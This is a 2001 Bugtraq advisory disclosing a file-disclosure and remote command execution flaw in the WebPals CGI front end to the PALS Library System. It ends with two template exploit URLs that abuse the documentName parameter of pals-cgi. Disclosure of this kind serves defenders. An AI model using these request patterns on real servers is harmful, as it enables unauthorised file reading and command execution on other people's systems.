Bugtraq mailing list archives
PALS Library System "show files" Vulnerability and remote command execution
From: UkR-XblP <cuctema () OK RU>
Date: Mon, 12 Feb 2001 17:17:46 +0300
Name: PALS Library System "show files" Vulnerability and remote command executiom. Date: 02.02.2001 About: This script is derived from an idea originated at St.Olaf College to provide a www interface to the PALS Library System. This idea was then worked on at Georgia State University. This version of WebPals has been written using their original ideal. Problem: Through this bug you can see any files and command execution. Problem lies in "pine pipe bug" Author: UkR-XblP Exploit: http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command Get your free e-mail address at http://www.zmail.ru
Current thread:
- PALS Library System "show files" Vulnerability and remote command execution UkR-XblP (Feb 12)